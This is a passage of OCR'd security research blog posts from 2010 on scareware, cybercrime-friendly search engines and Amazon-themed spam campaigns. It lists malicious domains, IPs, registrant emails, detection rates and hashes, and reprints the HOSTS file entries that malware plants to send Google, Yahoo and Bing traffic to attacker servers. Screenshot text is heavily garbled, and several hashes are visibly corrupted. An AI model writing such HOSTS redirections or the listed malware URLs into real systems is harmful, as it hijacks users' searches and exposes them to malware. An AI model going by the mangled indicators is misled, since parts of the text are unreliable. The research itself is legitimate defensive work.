myantivirsplus.org - Email: FranciscoPGeorge@hotmail.com 
my-antivirsplus.org - Email: FranciscoPGeorge@hotmail.com 
my-antivirusplus.org - Email: FranciscoPGeorge@hotmail.com 
my-antivirus-plus.org - Email: FranciscoPGeorge@hotmail.com 
myprotectonline.org - Email: FranciscoPGeorge@hotmail.com 
my-protectonline.org - Email: FranciscoPGeorge@hotmail.com 
my-protect-online.org - Email: FranciscoPGeorge@hotmail.com 
sysprotectonline.org - Email: FranciscoPGeorge@hotmail.com 
sys-protectonline.org - Email: FranciscoPGeorge@hotmail.com 
sys-protect-online.org - Email: FranciscoPGeorge@hotmail.com 


Parked at/responding to 91.188.59.74 are: 
allforilli.com - Email: lordjok@gmail.com 
alltubeforfree.com - Email: lordjok@gmail.com 
allxtubevids.net - Email: lordjok@gmail.com 
downloadfreenow.in - Email: lordjok@gmail.com 
enterilllisec.in - Email: leshapopovi@gmail.com 
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freeanalsextubemovies.com - Email: lordjok@gmail.com 
freetube06.com - Email: lordjok@gmail.com 
freeviewgogo.com - Email: leshapopovi@gmail.com 
homeamateurclips.com - Email: lordjok@gmail.com 
hot4youxxx.in - Email: lordjok@gmail.com 
hotxtube.in - Email: lordjok@gmail.com 
hotxxxtubevideo.com 

iilLO0i10.com 

ilioO1ilil.com 

illinolill.in - Email: lordjok@gmail.com 
porntube2000.com - Email: welolseeees@gmail.com 
porntubefast.com - Email: welolseeees@gmail.com 
porn-tube-video.com - Email: welolseeees@gmail.com 
viewnowfast.com - Email: lordjok@gmail.com 
viewxxxfreegall.net - Email: leshapopovi@gmail.com 
viiistiforl.com 

xhuilillii.com - Email: lordjok@gmail.com 
youvideoxxx.com - Email: jonnytrade@gmail.com 


chase ts Backed By 
ayMoney Back 


| Antivirus PIUS «seme somuare License Transaction nt: $68.45 
t $1.50. price: $69.95, 

Cater your puscneldetets _— Inter your card information 
First Mame: Last Name- Select Card type: [VISA =) 
Bilieg Address: Card Number: 
Oty: 
State: Select State *) Expiration date: [Month >) [Year >) 
Z1P/ Postal Code: 
Commtry: Select please =} cvca/cww2 enor 
fee, 
Emad: 


Process transaction 


= = 
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Parked at/responding to 85.234.190.16 are: 
appsd.in - Email: lvanovEvgeny@mail.com 
bikey.in - Email: lvanovEvgeny@mail.com 
fibnv.in - Email: SimakovSergey@mail.com 
franv.in - Email: SimakovSergey@mail.com 
guinv.in - Email: SimakovSergey@mail.com 
hekey.in - Email: ZaharcevSergey@mail.com 
intsd.in - Email: LomaevaTatyana@mail.com 
ionnv.in - Email: SimakovSergey@mail.com 
jamsd.in - Email: LomaevaTatyana@mail.com 
leunv.in - Email: SimakovSergey@mail.com 
nvenc.in - Email: BajenovOleg@mail.com 
pxdmx.in - Email: GaleevDjamil@mail.com 
uinei.in - Email: GaleevDjamil@mail.com 
uinge.in - Email: UshakovAndrey@mail.com 
uiren.in - Email: UshakovAndrey@mail.com 
uirin.in - Email: UshakovAndrey@mail.com 
uisap.in - Email: UshakovAndrey@mail.com 
uisee.in - Email: UshakovAndrey@mail.com 
woonv.in - Email: BajenovOleg@mail.com 
yxiam.in - Email: GaevAlexandr@mail.com 
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DISCOVER 


the Business Secrets 


Detection rates for the currently active malware samples, including the HOSTS file modifica- 
tions on infected hosts, for the purposely of redirecting users to [7]cybercrime-friendly search 
engines, monetized through traffic trading affiliate programs. 


- [8]78490.jar - Result: 0/42 (0 %) 

File size: 209 bytes 

MD5 : 64a19d9b7f0e81c7a5f6d63853a3ed49 

SHAI1 : 9f8f208c8cdb854cdc342d43a75a3d8672e87822 


- [9Jad3.exe 


[10] - Result: 41/42 (97.62 %) 

File size: 2560 bytes 

MD5...: 9362a3aee38102dde68211ccb63c3e07 

SHA1..: 8758679540f48feba82d2b022b8d71756eb935e7 


- [11 ]a-fast.exe - Result: 36/42 (85.72 %) 

File size: 979968 bytes 

MD5...: 69f3949141073679b77aa4d34e41a3e7 

SHA1..: e074de46e4760eef522ab85737790058cc3f2fad 
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- [12]dm.exe - Result: 37/42 (88.1 %) 

File size: 83968 bytes 

MD5...: b658d9b812454e99b2915ab2e9594b94 

SHAI1..: 134bfb643ae2f161c99db14c448485e261e96c91 


- [13 ]iv.exe - Result: 8/42 (19.05 %) 

File size: 86016 bytes 

MD5...: f94ed2f9d7a67 2fe3ff8bf077289b2d5 

SHA1..: 2f78a296e1267aelcf9ebd5c18de5b8d241c1306 


- [14]j2 t895.jar - Result: 0/42 (0 %) 

File size: 211 bytes 

MD5...: 4634618a0499a99e9c98e03aa79d53cf 

SHA1..: d109babf78ec48ba8d7798bce784097ed26757db 


- [15]movie.exe - Result: 40/42 (95.24 %) 

File size: 64866 bytes 

MD5...: 801f9fa958192b6714a5a4c2e2f92f07 

SHA1..: 241bc9d7540d9d53cc1578e3d57c44be9931e418 


- [L6]tst.exe - Result: 35/42 (83.34 %) 

File size: 356352 bytes 

MD5...: b0ed4701af13f11089de850a1273d24f 

SHA1..: 5€98000b60d0ca0b2adbd837feaf05f439f95c87 


- [17]wsc.exe - Result: 37/42 (88.1 %) 

File size: 24576 bytes 

MD5...: 80427b754b11de653758dd5elba3delc 
SHA1..: 554e1331fdc050bd603f6f3628285008a91cba37 
HOSTS file modification: 

AS28753, NETDIRECT AS NETDIRECT Frankfurt, DE 
89.149.210.109 www.google.com 
89.149.210.109 www.google.de 
89.149.210.109 www.google.fr 

89.149.210.109 www.google.co.uk 
89.149.210.109 www.google.com.br 
89.149.210.109 www.google.it 

89.149.210.109 www.google.es 
89.149.210.109 www.google.co.jp 
89.149.210.109 www.google.com.mx 
89.149.210.109 www.google.ca 
89.149.210.109 www.google.com.au 
89.149.210.109 www.google.nl 

89.149.210.109 www.google.co.za 
89.149.210.109 www.google.be 
89.149.210.109 www.google.gr 
89.149.210.109 www.google.at 

89.149.210.109 www.google.se 
89.149.210.109 www.google.ch 
89.149.210.109 www.google.pt 
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89.149.210.109 www.google.dk 
89.149.210.109 www.google.fi 
89.149.210.109 www.google.ie 
89.149.210.109 www.google.no 
89.149.210.109 search.yahoo.com 
89.149.210.109 us.search.yahoo.com 
89.149.210.109 uk.search.yahoo.com 


- [18]rc.exe - Result: 41/42 (97.62 %) 
File size: 2560 bytes 

MD5...: 9362a3aee38102dde68211ccb63c3e07 
SHAI1..: 8758679540f48feba82d2b022b8d71756eb935e7 
HOSTS file modification: 

AS28753, NETDIRECT AS NETDIRECT Frankfurt, DE 
89.149.249.196 www.google.com 
89.149.249.196 www.google.de 
89.149.249.196 www.google.fr 
89.149.249.196 www.google.co.uk 
89.149.249.196 www.google.com.br 
89.149.249.196 www.google.it 
89.149.249.196 www.google.es 
89.149.249.196 www.google.co.jp 
89.149.249.196 www.google.com.mx 
89.149.249.196 www.google.ca 
89.149.249.196 www.google.com.au 
89.149.249.196 www.google.nl 
89.149.249.196 www.google.co.za 
89.149.249.196 www.google.be 
89.149.249.196 www.google.gr 
89.149.249.196 www.google.at 
89.149.249.196 www.google.se 
89.149.249.196 www.google.ch 
89.149.249.196 www.google.pt 
89.149.249.196 www.google.dk 
89.149.249.196 www.google.fi 
89.149.249.196 www.google.ie 
89.149.249.196 www.google.no 
89.149.249.196 www.google.co.in 
89.149.249.196 search.yahoo.com 
89.149.249.196 us.search.yahoo.com 
89.149.249.196 uk.search.yahoo.com 


- [19 ]installer.0028.exe - Result: 9/42 (21.43 %) 

File size: 43735 bytes 

MD5...: a6d7073b8b9bc0dc539605914c853da2 

SHA1..: 1940b6a6b2f93b44633ef04eab900e0a9dcb6fab64 
HOSTS file modification: 

AS28753, NETDIRECT AS NETDIRECT Frankfurt, DE 
84.16.244.60 www.google.com 

84.16.244.60 us.search.yahoo.com 
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84.16.244.60 uk.search.yahoo.com 
84.16.244.60 search.yahoo.com 
84.16.244.60 www.google.com.br 
84.16.244.60 www.google.it 
84.16.244.60 www.google.es 
84.16.244.60 www.google.co.jp 
84.16.244.60 www.google.com.mx 
84.16.244.60 www.google.ca 
84.16.244.60 www.google.com.au 
84.16.244.60 www.google.nl 
84.16.244.60 www.google.co.za 
84.16.244.60 www.google.be 
84.16.244.60 www.google.gr 
84.16.244.60 www.google.at 
84.16.244.60 www.google.se 
84.16.244.60 www.google.ch 
84.16.244.60 www.google.pt 
84.16.244.60 www.google.dk 
84.16.244.60 www.google.fi 
84.16.244.60 www.google.ie 
84.16.244.60 www.google.no 
84.16.244.60 www.google.de 
84.16.244.60 www.google.fr 
84.16.244.60 www.google.co.uk 
84.16.244.60 www.bing.com 


- [20]installer.0022.exe - Result: 9/42 (21.43 %) 


File size: 43731 bytes 


MD5...: 62464b9e367a9edb06541a2a90931157 
SHA1..: 425c859a883900ccf5cf7b8a6a5f6bc92 79d763c 


HOSTS file modification: 


AS28753, NETDIRECT AS NETDIRECT Frankfurt, DE 


84.16.244.15 www.google.com 
84.16.244.15 us.search.yahoo.com 
84.16.244.15 uk.search.yahoo.com 
84.16.244.15 search.yahoo.com 
84.16.244.15 www.google.com.br 
84.16.244.15 www.google.it 
84.16.244.15 www.google.es 
84.16.244.15 www.google.co.jp 
84.16.244.15 www.google.com.mx 
84.16.244.15 www.google.ca 
84.16.244.15 www.google.com.au 
84.16.244.15 www.google.nl 
84.16.244.15 www.google.co.za 
84.16.244.15 www.google.be 
84.16.244.15 www.google.gr 
84.16.244.15 www.google.at 
84.16.244.15 www.google.se 
84.16.244.15 www.google.ch 
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84.16.244.15 www.google.pt 
84.16.244.15 www.google.dk 
84.16.244.15 www.google.fi 
84.16.244.15 www.google.ie 
84.16.244.15 www.google.no 
84.16.244.15 www.google.de 
84.16.244.15 www.google.fr 
84.16.244.15 www.google.co.uk 
84.16.244.15 www.bing.com 


The payment gateway structure+related domains for the scareware campaigns: 

- fast-payments.com/index.php?prodid=antus 02 01 G&afid= - 91.188.59.27 - Email: 
jclarke980@gmail.com 

- ns1.fastsecurebilling.com - 91.188.59.26 - Email: jclarkeQ980@gmail.com 

- easypayments-online.com - 91.188.59.28 - Email: jclarke980@gmail.com 

- fast-payments.com - 91.188.59.27 - Email: jclarke980@gmail.com 

- billingonline.net - 91.188.59.29 - Email: kevbush@billingonline.net 

- billsolutions.net - 91.188.59.25 


In respect to the IPs used in HOSTS file modification, one is of particular interest - 
89.149.210.109, as it was first profiled in November, 2009’s "[21]Koobface Botnet’s Scare- 
ware Business Model - Part Two" with MD5: Ofbfla9f8e6e305138151440da58b4f1 modifying 
HOSTS file using the same IP, and also phoning back to the Koobface gang’s 1.0 hardcore C 
&C - urodinam.net/8732489273.php 


When it comes to cybercrime, there’s no such thing as a coincidence. What’s static is 
the [22]interaction between the usual suspects, systematically switching hosting providers, 
introducing new domains, and [23]conveniently denying their monetization tactics. 


You wish. 


Profiled AS6851, BKCNET/Sagade Ltd. activity: 

[24]GoDaddy’s Mass WordPress Blogs Compromise Serving Scareware 

[25]Dissecting the Mass DreamHost Sites Compromise 

[26]Spamvertised iTunes Gift Certificates and CV Themed Malware Campaigns 

[27]Dissecting the 100,000+ Scareware Serving Fake YouTube Pages Campaign 

[28]Facebook Photo Album Themed Malware Campaign, Mass SQL Injection Attacks Courtesy 
of AS42560 


This post has been reproduced from [29]Dancho Danchev’s blog. Follow him 
[30]Jon Twitter. 


. http: //cidr-report .org/cgi-bin/as-report?as=AS6851 
. http: //ddanchev. blogspot .com/2010/05/dissecting-mass-dreamhost-sites.htm 
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6.7.4 Sampling Malicious Activity Inside Cybercrime-Friendly Search Engines 
(2010-07-15 17:44) 


Search the Web: 
Art Entertainment Health Business Personal Finances 
Books Baseball Betting Anti Aging Auctions Bad Credit 
DirecTV Basketball Betting Cancer Accounting Accounting 
eBooks Black Jack Cosmetic Surgery Business Insurance Consolidate Debt 
Fine Art Casino Fitness Conference Call Credit card Debt 
Movies Escorts Hair Loss Credit Report Credit counseling 
Music Football Betting Herbal Medicine Franchise Divorce 
Television Gamble Herbalife Human Resources Estate Planning 
Online Poker Liposuction Lawyer Financial Services 
Horse Betting Lose Weight LCD Projector Home Equity Loan 
Rone Play Poker Nutritional Supplements Long Distance Investing 
Ain locwrence Online Gambling Obesity Marketing Money Management 
cas Dees Online Shopping Online Pharmacy Office Supplies M e Quote 
Berk Cor Party Poker Pain Relief Payroll Mortgage Rates 
a= Personals Pharmacy Press Release Mortgages 
Cer lioen Pets Plastic Surgery Project Management _— Real Estate 
New Cars Poker Self Improvement Time Clock Refinance 
alas Roulette Stop Smoki Trade Show Tax Preparation 
a ees Sports Books Valium Trademarks Wedding 
Table Games Vitamins Training Wills 
Shopping Travel Computers Careers Sexual Health 
Diamonds Adventure Travel Antivirus Software Advertising Careers Breast Enlargement 
eBay Ai Travel Cameras College Herbal Viagra 
Electronics Celebrity Crises Computer Virus Distance Learning Penis Enlargement 
Gift Baskets Cheap Hotels Desktop Computers Education Penis Pills 
Online Shopping _ Disney Digital Photography Employment Pheromone 
Toys Las Vegas Hotels Laptops Information Technology Sexual Enhancement 
Watches Nutrition Travel MP3 Downloads Resume Viagra 
Weddine Gift Travel Insurance Software Jork From Home Viagra Alternatives 


UPDATED, Friday, July 16, 2010 - Directi has suspended the domains portfolio of the cybercrime- 
friendly search engines. 


[1]Cybercrime-friendly search engines are bogus search engines, which in between visu- 
ally social engineering their users, offer fake results leading to client-side exploits, bogus 
video players dropping more malware, scareware, next to the pharmaceutical scams, and 
domain farms neatly embedded with Google AdSense scripts for monetization. 


x 


In the majority of cases - whenever blackhat SEO is not an option - end users are exposed the 
their maliciousness once they get infected with malware redirecting each and every request to 
popular search engines such as Google, Yahoo and Bing to the malicious IPs/domains operated 
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by the cybercriminals. 


As far as their monetization tactics are concerned, fellow cybercriminals are free to pur- 
chase any kind of keyword they want to, for instance "spyware", make it look like the end user 
is clicking on security-vendor.com’s site, whereas upon clicking, based on his physical location 
a particular type of malicious activity takes place. 


Remember the HOSTS file modification taking place courtesy of the malware at [2]AS6851, 
BKCNET, Sagade Ltd., and in particular the [3]Koobface gang related IP 89.149.210.109? 
Sampling the malicious activity within the search engines parked/forwarded (DNS recursion) 
from this IP, results in client-side exploits, bogus video players dropping malware, and scare- 
ware, and that in less than 5 minutes of testing. 


Related Searches 


ware Surveil 
f moval 
Addware And Spyware 
Registry Have Spyware 
Microsoft Spyware 


Spyware Doktor 
Spyware Stomer 
Spyware Removal 


if 


Music Downloads No 
Spyware 


Recent Searches 


Penny Stock Investing 
Invest In Stocks 


in le Stock 


Investing Stock 
Isdn Voip 


spyware ] 


Search results: spyware 


Results 


x 


Get Rid Of Spyware Now 
Does your computer have spyware on it? Protect your computer and get rid of it now. 
http://www.wiinjamod.com 


Best mobile phone offers ! 
Ringtones, Graphics, Wallpaper, Games, Text 
http://mob4worid.com 


Spyware Removal Download - Download Now 
Award-winning Spyware Remover. Scans & removes Spyware. Download now! 
http:/Arafgo.biz 


Best Spyware Removal 
Most highly awarded anti-spyware. Free, safe, accurate spyware scan. 
http://spytds.com 


Free Viagra Online! 

Viagra is used to cure erectile dysfunction by relaxing the body muscles and increasing the 
blood flow to various parts of the body including a man&apos:s penis. 

http://www. freeviagraonline.com 


2008 Free Spyware Removal 
Top Ranked, As Seen on USA Today Detect & Remove, Spyware and Virus 
http://CyberDefender.com 


Spyware Free 
Protect Your PC From Spyware, Viruses & Other Threats. 
http://Spyware-Free.net 


The cybercrime-friendly domains in question: 


searchclickl.com - Email 
searchclick2.com - Email 
searchclick3.com - Email 
searchclick4.com - Email 
searchclick5.com - Email 
searchclick6.com - Email 


: d.bond@mail.ru - 78.159.112.46 - AS28753 
: d.bond@mail.ru - 78.159.112.46 - AS28753 
: d.bond@mail.ru - 78.159.112.46 - AS28753 
: d.bond@mail.ru - 78.159.112.46 - AS28753 
: d.bond@mail.ru - 78.159.112.46 - AS28753 
: d.bond@mail.ru - 78.159.112.46 - AS28753 
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searchclick7.com - Email: d.bond@mail.ru - 78.159.112.46 - AS28753 
searchclick8.com - Email: d.bond@mail.ru - 78.159.112.46 - AS28753 
searchclick9.com - Email: d.bond@mail.ru - 78.159.112.46 - AS28753 
searchclick10.com - Email: d.bond@mail.ru - 78.159.112.46 - AS28753 
searchmeup4.com - 78.159.112.46 - AS28753 

zetaclicks4.com - 78.159.112.46 - AS28753 

websafeclicks.com - Email: d.bond@mail.ru - 78.159.112.46 - AS28753 


Internal redirections reading to malicious take place through the following domains: 
7search.com - 12.171.94.40 - Email: webadmin@7search.com 

greatseeking.com, superfindmea.info - 213.174.154.9 - Email: serdukov.art@gmail.com 
superseeking.org - 213.174.154.9 - Email: serdukov.art@gmail.com 

searching4all.com, pharmc9.com - 66.230.188.68 - Email: abuse@click9.com 
syssmessage.com; sysstem-mesage.com; syS-mesage.com; potectmesage.com 
91.188.59.62 - Email: roroaleksey@gmail.com 

xml.click9.com/click.php - 66.230.188.67 - Email: abuse@click9.com 
sunday-traffic.com/in.php - 74.52.216.46 - Email: tech@add-manager.com 
efindsite.info/search2.php - 74.52.216.46 

greatseeking.com/search2.php - 213.174.154.9 - Email: serdukov.art@gmail.com 
n-traff.com/clickn.php - 64.111.208.39 

going-to-n.com/clickn.php - 64.111.208.38 

everytds.tk/in.cgi?3= &ID=19504; onlyscan.tk; pornstaar.tk; dotroot.tk - 94.100.31.26 


Internal pharmaceutical redirections take place through the following domains: 
medsbrands.com - 74.52.216.46 - Email: tech@add-manager.com 
thepillsdiscounts.info - 74.52.216.46 - Email: tech@add-manager.com 
yourcatalogonline.biz - 74.52.216.46 

bestderden.org - 74.52.216.46 


Internal redirections reading to malicious take place through the following IPs: 
199.80.55.19/go.php?data= 
199.80.55.80/go.php?data= 
78.140.141.18/kkk.php 
78.140.143.83/go.php 
64.111.212.234/c.php 
64.111.196.126/c.php 
66.230.188.67 
68.169.92.61/c.php 
68.169.92.60/c.php 
68.169.93.242/c.php 
68.169.92.55/c.php 
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System Tasks 
2] View systert forma tors 
iS 20d oF remove programs . indows Security Alert 


Go Change 4 settings 


To help protect your computer, Windows Web Securi 
—_ VW have detected Trojans and ready to remove them, 
Other Places , 


Le] My Network Places 
Detected spyware and adware on your computer 


@ Wed2 Let netsky 25328 
ES Swed Coomens @ Trojentacoder.67 

o Control Pare Q xFAugunayitam 

Q Wind2/ContickerAt 

@ Backdoor. win32.Btrosecoqy 


Q” Documents 


Spynare is softmare, which can gather nformaton from user's computer 
Prought internet commecton and send them to s cester, Gather 
information can be passwords, e-mal adresses and al tut deta, whichis 


Sample malicious activity consists of scareware campaigns, client-side exploits, and bogus 
video players dropping malware. 


Upon visiting the bogus PornTube at vogel-tube.com/xfreeporn.php?id= - 66.197.187.118 
(the-real-tube-best.com great-celebs-tube.net parked there) - Email: admin@thenweb.com 
the use is tricked into manually installing basemultimedia.com/video-plugin.45309.exe - 
66.197.154.21 (visualbasismedia.com) - Email: joe@silentringer.com 


- Detection rate 

[4]video-plugin.45309.exe - Downloader-CEW.b, Result: 6/42 (14.29 %) 
File size: 113152 bytes 

MD5...: 25e€644171bf9ee2a052b5fa71f8284e5 

SHA1..: e4ac01534c7c1b71d2a38cf480339d31db187ecb 


Upon execution, the sample phones back to: 
best-arts-2010.com - 216.240.146.119 - Email: 
hello-arts.com - 64.191.44.73 - Email: 
youngfinearts.com - 64.20.35.3 - Email: 
newchannelarts.com - 64.191.64.105 - Email: 
vrera.com/oms.php - 208.43.125.180 - Email: 
allxt.com/borders.php - 64.191.82.25 


Parked at 216.240.146.119, AS7796 are also: 
best-arts-2010.com - Email: aurora@seekrevenue.com 
crystaldesignlab.com - Email: tamara.watson@chemist.com 
homegraphicarts.com - Email: elizabethj@theplate.com 
mediaartsplaza.com - Email: darhom@lendingears.com 
morefinearts.net - Email: vdickerson37@yahoo.com 
photoartsworld.com - Email: margaret _adams@rocketmail.com 
pinehousearts.com - Email: jgaron@physicist.net 
sunnyartsite.com - Email: joowker@blader.com 

thefanarts.com - Email: keasler@surferdude.com 
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waycoolart.com - Email: blynch@net-shopping.com 
woodsmayart.com - Email: raymo@songwriter.net 
garner.funtaff.com - Email: dph@greentooth.net 


Viagra, Cis, Levitra and other drugs Online Pharmacy My Account « Order Stetus + Wish Lists + Gif Certificates « View Cart « Sign in or Create an account 


Search 
- 
all-Frice - 1@ 
http tteww hall. pnce-pharmacy co = = - Advanced Search | Search Tips 
p; m « Affilistes ¢ Aboutus ¢ Contactus « Health articles « Ask a Docto 


PHARMACY 


of 


Categories free shipping 


Wens Keath AlertSitee 
Prentie Eacuster welcome to our pharmacy ASAFE SITE 
Erectie Oystuacton Tested ~ 2010-Jul-12 


private and confidential ° 


ane no prior prescription required © 
safe and secure order ° 


Currency Converter 


Top SELLERS with best cash value for orders below $200 


oe Choose 8 currency below to 
Ssplsy product pnces mi he 


selected currency 


Anb-cepressants 


Genenc Prozac 
Generic Zoloft 


8 US Ooter 


GZ Pound 


Current Top Sellers 


Artes 


Genenc Zimromax 


—— Generic Viagra 50mg J Generic Cialis 20 


Parked at 64.191.44.73, AS21788 are also: 

auctionhouseart.com - Email: emerynancy@ymail.com 
bestmalearts.com - Email: mcfarlin@religions.com 

coolcatart.com - Email: pbiron@catlover.com 

freesurrealarts.com - Email: ghuertas@rocketmail.com 
goldfireart.com - Email: thysell@gardener.com 

greatmovieart.com - Email: linger@theplate.com 
worldartsguide.com - Email: ghagen@allergist.com 
install.netwaq.com - Email: admin@overseedomainmanagement.com 


Parked at 64.20.35.3, AS19318 are also: 
artscontact.net - Email: mschneider@doctor.com 
catbodyart.com - Email: pbiron@catlover.com 
feearts.com - Email: breckenridge56@hotmail.com 
freeflasharts.com - Email: russell@clubmember.org 
gardendesignart.com - Email: jasona@gardener.com 
greatflashstudies.com - Email: jdeal@worshipper.com 
superlegoarts.com - Email: jdeal@worshipper.com 
thedigitalarts.com - Email: hoffman@theaterpillow.com 
virginmegaart.com - Email: hoffman@theaterpillow.com 
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best-arts-2010.com 
crystaldesigniab.com 
homegraphicarts.com 
mediaartsplaza.com 


morefinearts.net 


photoartsworld.com s 216.240.146.119 we 


A ? garnerfuntaff.com 


216.240.144.0/20 ——4S-ge AS7796 


pinehousearts.com 
sunnyartsite.com 
thefanarts.com 
waycoolart.com 


woodsmayartcom 


Related malicious domains sharing the same DNS infrastructure: 
iransatnews.org 

best-arts-2010.com - Email: aurora@seekrevenue.com 
mediasite2010.com - Email: webmaster@pullstraws.com 
setlamedia.com - Email: monro@eclipsetool.com 
doublesetmedia.com - Email: monro@eclipsetool.com 
thetestmedia.com - Email: webmaster@maidnews.com 
trinitytestmedia.com - Email: webmaster@maidnews.com 
i-metodika.com - Email: facovskiy _n__1977@rambler.ru 
iffic.com 

moviefactinc.com - Email: usa@crystals.com 
newdataltd.com - Email: wenzel@techie.com 
new-2010-tube.com - Email: fortney@petlover.com 
super-world-tube.com - Email: fortney@petlover.com 
real-good-tube.com - Email: fortney@petlover.com 
green-real-tube.com - Email: sanctim59@yahoo.com 
sensual-tube.com - Email: sanctim59@yahoo.com 
webfilmoffice.com - Email: pam@skunkalert.com 
xxl-tube-home.com 

nowsearchonline.com 

localmediasearch.com - Email: mega@stockdvds.com 
mediaonsearch.com - Email: mega@stockdvds.com 
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mesghal.com - Email: shahnamgolshany@yahoo.com 
niptoon.com 

mydvdinfo.com - Email: usa@crystals.com 
receptionist-pro.com 

hitinto.com 

importedfoodscorp.com - Email: apompeo@importedfoodscorp.com 
newhavenfiles.com - Email: wenzel@techie.com 
walterwagnerassociates.com 

excellentutilites.com - Email: wentexkino@ymail.com 
pengs.com 

livingwithdragons.com - Email: gregory@lamerton.|td.uk 
amigroups.com 

iransatnews.com 

dvddatadirect.com - Email: friese@toke.com 

itlist.com - Email: support@gossimer.biz 

gossimer.net - Email: support@gossimer.biz 


sarchclick10 
ic. php?s=eNo1lMsOgsoWRT-IRogiqlau6Hi4xRERRQ7 JzyqBE 
9.92, /c.php?re=18r=eNo1IMsOgsoWRT-IRIogiqlau6HiAxRERRQ? 
going-to-n.com | DaESQRTRPbnRETZ... 
everytds.tk ¥SmtZWFJoSWpOaESqrT... 


xoxipemej.cn 


ipemej.cn 


emej.cn 


Following the bogus dropper, the cybercriminals are also directly serving client-side exploits 
to users seeking for security related content. In this case, the exploits/malware are served 
from xoxipemej.cn/gr/s1/ - 178.63.170.185 - Email: shiwei fang77@126.com. 


- Detection rate: 

[5].exe - Rootkit.Agent.AJDR, Result: 20/42 (47.62 %) 
File size: 53760 bytes 

MD5...: 23244c5b5b02fab65b3a7ab51005fd51 

SHA1..: a5f1a10344378f2c8f13c266dce39247ba3bae5f 
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bbbinvestigation.org 
best-sofa-choice.com 
celloffer-2015.com 
tlying-city-2011L.com 
jiujitsutgua.com 


lokexawan.cn 


mail visiugweytyiw.com 178.63.0.0/16 AS_y as24g40 


Nv 


melonirmonianmonia.com = 178.63.170.185 = 


A static.185.170.63.178.clients.your-server.de 


nasnedotweiggytcom 
redspot2010.com 
rohudutoj.cn 
uweyujem.com 
visiugweytyiw.com 
wkeuhryyejtcom 


xoxipemej.cn 


Parked on the same IP 178.63.170.185, AS24940 are also: 
201 1traff.com - Email: MillieDiaz4@aol.com 
2011-traff.com - Email: MillieDiaz4@aol.com 
bbbinvestigation.org - Email: accounting@moniker.com 
best-sofa-choice.com - Email: migray71@yahoo.com 
celloffer-2015.com - Email: migray7l1@yahoo.com 
flying-city-2011.com - Email: migray71@yahoo.com 
jiujitsufgua.com - Email: varcraft@care2.com 
jopaduloz.cn - Email: ging hongwei@126.com 
lokexawan.cn - Email: shiwei _fang77@126.com 
mapozelogq.cn - Email: shiwei fang77@126.com 
melonirmonianmonia.com - Email: accounting@moniker.com 
mivaqodaz.cn - Email: shiwei _fang77@126.com 
nasnedofweiggyt.com - Email: roller 59@hotmail.com 
redolopip.cn - Email: shiwei fang77@126.com 
redspot2010.com - Email: migray71@yahoo.com 
rohudufoj.cn - Email: ging hongwei@126.com 
sujelodos.cn - Email: ging hongwei@126.com 
traff2011.com - Email: MillieDiaz4@aol.com 
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traff-2012.com - Email: MillieDiaz4@aol.com 
uweyujem.com - Email: resumemolars@live.com 
viwuvefot.cn - Email: shiwei _fang77@126.com 
wkeuhryyejt.com - Email: excins@iname.com 
xoxipemej.cn - Email: shiwei _fang77@126.com 


Last, but not least is the scareware_ infection taking place through 
www1.warezforyou24.co.cc/?p=p52 - 114.207.244.146; 114.207.244.143; 114.207.244.144; 
114.207.244.145. Parked on these IPs is also an extensive portfolio of related scareware 
domains. 


- Detection rate: 

[6]packupdate107 231.exe - Suspicious:W32/Malware!Gemini, Result: 3/42 (7.15 %) 
File size: 238080 bytes 

MD5...: 93517875c59ac33dab655bc8432b0724 

SHA1..: 774af049406baeef3427b91a2d67ee0250b2b51b 


Upon execution the sample phones back to: 

update2.cleanupyoursoft.com - 209.222.8.101 - Email: gkook@checkjemail.nl 
updatel.soft-cleaner.com - 95.169.186.25 - Email: gkook@checkjemail.nl 
securel.smartavz.com - 91.207.192.26 - Email: gkook@checkjemail.nl 
report.mygoodguardian.com - 93.186.124.94 - Email: gkook@checkjemail.nl 
www5.securitymasterav.com - 91.207.192.25 - Email: gkook@checkjemail.nl 
update2.soft-cleaner.net - 209.222.8.100 - Email: gkook@checkjemail.nl 
report.mytrueguardian.net - 79.171.23.150 - Email: gkook@checkjemail.n! 
secure2.smartavz.net - 217.23.5.99 - Email: gkook@checkjemail.nl 
updatel.free-guard.com - Email: gkook@checkjemail.nl 
report.mygoodguardian.com - 93.186.124.94 - Email: gkook@checkjemail.nl 
updatel.soft-cleaner.com - 95.169.186.25 - Email: gkook@checkjemail.nl 
www5.securitymasterav.com - 91.207.192.25 - Email: gkook@checkjemail.nl 
update2.soft-cleaner.net - 209.222.8.100 - Email: gkook@checkjemail.nl 
report.mytrueguardian.net - 79.171.23.150 - Email: gkook@checkjemail.nl 


The cybercrime-friendly domains portfolio is in a process of getting suspended. 


This post has been reproduced from [7]Dancho Danchev’s blog. Follow him 
[8]Jon Twitter. 


. http: //www.zdnet .com/blog/security/cybercriminals-promoting-malware-friendly-search-engines/3333 


1 

2. beep: / /ddanchev. blogspot .com/2010/07 /explosts-nalvare-and-scarevare- courtesy tal 
3, http: / /Adanchev. blogspot. con/2009/11/koobface-botnets-scarevare-business. htm] 

4 
97428 

5 
6 


7. http://ddanchev. blogspot .com/ 
8. http: //twitter .com/danchodanche 
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6.7.5 Spamvertised Amazon "Verify Your Email", "Your Amazon Order" Malicious 
Emails (2010-07-16 21:17) 


~ ae amazoncom 


Verify Your New E-mail Address 


Dear 

You recently changed your e-mail address at Amazon.com. Since you are a subscriber of 
Amazon.com Delivers E-mail Subscriptions, you will need to verify your new e-mail address, 
Please verify that the e-mail address belongs to you. You can click on the 


link below to complete the verification process 


Alternatively, you can type or paste the following link into your Web browser: 
http: //www.amazon.com 


If you no longer wish to receive Amazon.com Delivers E-mail Subscriptions, you can unsubscribe here. 
Please note that this message was sent to the following e-mail address: 
Help | Conditions of Use | Privacy Notice © 1995-2006, Amazon.com, Inc or its affiliates, 


And they’re back (Gumblar or RUmblar due to the extensive use of .ru domains) for a decent 
start of the weekend - switching social engineering themes one more time, this time imper- 
sonating Amazon.com 


¢ NOTE: A summary of the malicious payload served will be posted at a later stage. Mean- 
while, in order to facilitate quicker response, a complete list of the domains participating 
will be featured/disseminated across the appropriate parties. 


- Sample subject: Amazon.com: Please verify your new e-mail address 

- Sample message: "Dear email, You recently changed your e-mail address at Amazon.com. 
Since you are a subscriber of Amazon.com Delivers E-mail Subscriptions, you will need to 
verify your new e-mail address. Please verify that the e-mail address email belongs to you. 
You can click on the link below to complete the verification process. Alternatively, you can 
type or paste the following link into your Web browser: http:/;www.amazon.com" 
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nsl.areadrum.com 
nsl.cafemack.com 
nsl.clanday.com 
nsl.dnsofthost.com 
nsl.earlymale.com 
nsl.eyesong.ru 


